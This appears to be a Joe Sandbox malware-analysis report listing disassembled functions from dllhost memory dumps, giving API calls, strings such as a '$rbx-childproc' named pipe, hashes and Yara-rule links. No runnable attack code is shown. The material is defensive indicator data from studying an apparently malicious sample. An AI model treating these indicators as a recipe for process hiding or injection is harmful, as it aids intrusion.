Function 000001EF094233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001EF094233FD
GetProcessHeap.KERNEL32 ref: 000001EF09423412
HeapAlloc.KERNEL32 ref: 000001EF09423420
PdhGetCounterInfoW.PDH ref: 000001EF09423436
StrCmpW.SHLWAPI ref: 000001EF0942344B

Part of subcall function 000001EF09423950: StrCmpNW.SHLWAPI ref: 000001EF09423972
Part of subcall function 000001EF09423950: StrStrW.SHLWAPI ref: 000001EF09423990
Part of subcall function 000001EF09423950: StrToIntW.SHLWAPI ref: 000001EF094239B7

GetProcessHeap.KERNEL32 ref: 000001EF09423488
HeapFree.KERNEL32 ref: 000001EF09423496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001EF09423444

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 267318a4f7eb95769c02ec43edcd79215f1b4e247010818f431d15dbaa9f3ad6
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 31314135A00AC096EB21DF22E94479DA3A2B7D8FA5F88C53DBD4942626EF3CC5578740

Function 000001EF092234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001EF09223516
GetProcessHeap.KERNEL32 ref: 000001EF09223527
HeapAlloc.KERNEL32 ref: 000001EF09223535
PdhGetCounterInfoW.PDH ref: 000001EF0922354B
StrCmpW.SHLWAPI ref: 000001EF09223560

Part of subcall function 000001EF09223950: StrCmpNW.SHLWAPI ref: 000001EF09223972
Part of subcall function 000001EF09223950: StrStrW.SHLWAPI ref: 000001EF09223990
Part of subcall function 000001EF09223950: StrToIntW.SHLWAPI ref: 000001EF092239B7

GetProcessHeap.KERNEL32 ref: 000001EF0922358D
HeapFree.KERNEL32 ref: 000001EF0922359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001EF09223559

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: e55fc0ff8eda16f24bdd03160734256f8f822449fb435367887c55b7d741a8c6
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: D431FB31610B859AE750DF22E984B9D63A2BBC8F95F48813DEE4E43726EF3CC4578600

Function 000001EF094234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001EF09423516
GetProcessHeap.KERNEL32 ref: 000001EF09423527
HeapAlloc.KERNEL32 ref: 000001EF09423535
PdhGetCounterInfoW.PDH ref: 000001EF0942354B
StrCmpW.SHLWAPI ref: 000001EF09423560

Part of subcall function 000001EF09423950: StrCmpNW.SHLWAPI ref: 000001EF09423972
Part of subcall function 000001EF09423950: StrStrW.SHLWAPI ref: 000001EF09423990
Part of subcall function 000001EF09423950: StrToIntW.SHLWAPI ref: 000001EF094239B7

GetProcessHeap.KERNEL32 ref: 000001EF0942358D
HeapFree.KERNEL32 ref: 000001EF0942359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001EF09423559

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 66df7686e373e6b0703641c3a1a2d3a01a2f924276f2e771d1b4803717236d9e
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 2D31FE39610BC586EB54DF22E94479D63A2B7C4FA5F48C13DAE4A43726EE39C4978600

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Function 000001EF0922A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001EF0922A289

Part of subcall function 000001EF0922B144: __GetUnwindTryBlock.LIBCMT ref: 000001EF0922B187
Part of subcall function 000001EF0922B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001EF0922B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001EF0922A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001EF0922A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001EF0922A6BC

Strings

csm, xrefs: 000001EF0922A2A3
csm, xrefs: 000001EF0922A30A
csm, xrefs: 000001EF0922A384

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 4a2781f55ce4d218829d96b48c44c163d4583220ae7b79ceabd206b7a5d6e385
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: EAD18E32A047C0AAEB20DF65D5413ED77A2F785798F180129FE8957B9BEB34C496C700

Function 000001EF0942A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001EF0942A289

Part of subcall function 000001EF0942B144: __GetUnwindTryBlock.LIBCMT ref: 000001EF0942B187
Part of subcall function 000001EF0942B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001EF0942B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001EF0942A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001EF0942A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001EF0942A6BC

Strings

csm, xrefs: 000001EF0942A2A3
csm, xrefs: 000001EF0942A384
csm, xrefs: 000001EF0942A30A

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: e950133cc64b0bf9c756e9b050fd6aa49096f1d31f6117f5cd5d45d479bf7017
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 34D17D3A6047C08AEB20DB65D4403DD77A2F7897A8F98C129FE8957B97EB35C482C700

Function 000001EF091F962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001EF091F9689

Part of subcall function 000001EF091FA544: __GetUnwindTryBlock.LIBCMT ref: 000001EF091FA587
Part of subcall function 000001EF091FA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001EF091FA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001EF091F9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001EF091F99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001EF091F9ABC

Strings

csm, xrefs: 000001EF091F9784
csm, xrefs: 000001EF091F96A3
csm, xrefs: 000001EF091F970A

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: fc028005dc750ec03548f7bf43347b12d4d0e140b149f322bb4c589a6e95c141
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 5AD17E7270478886EB60EF65D4A03DD77A1F785798F180229FE8957B9BEB34C082C740

Function 000001EF0922104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EF092210B1
RegEnumValueW.ADVAPI32 ref: 000001EF09221117
GetProcessHeap.KERNEL32 ref: 000001EF0922115A
HeapAlloc.KERNEL32 ref: 000001EF09221168
GetProcessHeap.KERNEL32 ref: 000001EF09221185
HeapFree.KERNEL32 ref: 000001EF09221193

Strings

d, xrefs: 000001EF092210D6

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: e831485c0bc4d227e87a5140ea49f35d87eba2b40be02787b1f71c7e7af64d67
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 18412F72214BC4D6E760CF61E44479E77A2F388B98F488129EE8907759EF3CC556CB40

Function 000001EF0942104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EF094210B1
RegEnumValueW.ADVAPI32 ref: 000001EF09421117
GetProcessHeap.KERNEL32 ref: 000001EF0942115A
HeapAlloc.KERNEL32 ref: 000001EF09421168
GetProcessHeap.KERNEL32 ref: 000001EF09421185
HeapFree.KERNEL32 ref: 000001EF09421193

Strings

d, xrefs: 000001EF094210D6

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: c1ad38091cd858f7ee158c40272fddf9c5b966641ce9c3225c56e71c8fa1deae
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 2F414F36614BC4D6E760CF21E4447AE77A2F388B98F48C129EE8907758EF39C546CB40

Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400010B1
RegEnumValueW.ADVAPI32 ref: 0000000140001117
GetProcessHeap.KERNEL32 ref: 000000014000115A
HeapAlloc.KERNEL32 ref: 0000000140001168
GetProcessHeap.KERNEL32 ref: 0000000140001185
HeapFree.KERNEL32 ref: 0000000140001193

Strings

d, xrefs: 00000001400010D6

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Function 000001EF09222518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001EF0922252D
GetCurrentProcessId.KERNEL32 ref: 000001EF09222537
CreateFileW.KERNEL32 ref: 000001EF09222568
WriteFile.KERNEL32 ref: 000001EF09222590
ReadFile.KERNEL32 ref: 000001EF092225AF
CloseHandle.KERNEL32 ref: 000001EF092225B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001EF09222549

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: bbeca51580b396dafb86b956998b2e05c33cf578644dd1a48ade67878bde4867
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: DE113D31619B8092E7108B21F55479D7761F389B94F984229FE9D02AA9EF3DC156CB40

Function 000001EF09422518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001EF0942252D
GetCurrentProcessId.KERNEL32 ref: 000001EF09422537
CreateFileW.KERNEL32 ref: 000001EF09422568
WriteFile.KERNEL32 ref: 000001EF09422590
ReadFile.KERNEL32 ref: 000001EF094225AF
CloseHandle.KERNEL32 ref: 000001EF094225B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001EF09422549

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: af28c7787a8e59b9465463149b6944e95b3700b9414c312242eac058a816e0ab
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: CB113D356187C092E7108B21F55439D7771F389BA4F98C229FE9902AA9EF7DC146CB40

Function 000001EF09227C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001EF09227C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001EF09227CCA
_RTC_Initialize.LIBCMT ref: 000001EF09227CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001EF09227D1E
__scrt_release_startup_lock.LIBCMT ref: 000001EF09227D49

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 702d1a2b6a2b77fa669f479ce1f33957d8ed2ce2c0078fee87a47ee3fafa64a5
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: CD818C31A087C1A6FA60AB66D4413ED639BABD5B84F5C813DBE4847797FB38D8478700

Function 000001EF09427C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001EF09427C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001EF09427CCA
_RTC_Initialize.LIBCMT ref: 000001EF09427CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001EF09427D1E
__scrt_release_startup_lock.LIBCMT ref: 000001EF09427D49

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: d99235cdc05993c41fb060c54ae44cf2e397157ece6ee86aff317ccd65c835b6
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B2819D396146C186FA60AB66D4513ED6293BBC5BB4F9CC03DBE4847797FA3AD8478300

Function 000001EF091F7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001EF091F7078
__scrt_acquire_startup_lock.LIBCMT ref: 000001EF091F70CA
_RTC_Initialize.LIBCMT ref: 000001EF091F70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001EF091F711E
__scrt_release_startup_lock.LIBCMT ref: 000001EF091F7149

Memory Dump Source

Source File: 00000029.00000003.2189049157.000001EF091F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EF091F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_1ef091f0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: b920fa17ed4afdda0d8cfae514d0b361e9f8ff6db6eba7155a4ed0bf042bbd31
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: F3817C317046C986FA64AB66D8613DD6393ABC6780F5C813DBE09477E7FA38C95B8700

Function 000001EF09229AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B31
GetLastError.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B3F
LoadLibraryExW.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229B69
FreeLibrary.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229BD7
GetProcAddress.KERNEL32(?,?,?,000001EF09229C6B,?,?,?,000001EF0922945C,?,?,?,?,000001EF09228F65), ref: 000001EF09229BE3

Strings

api-ms-, xrefs: 000001EF09229B51

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

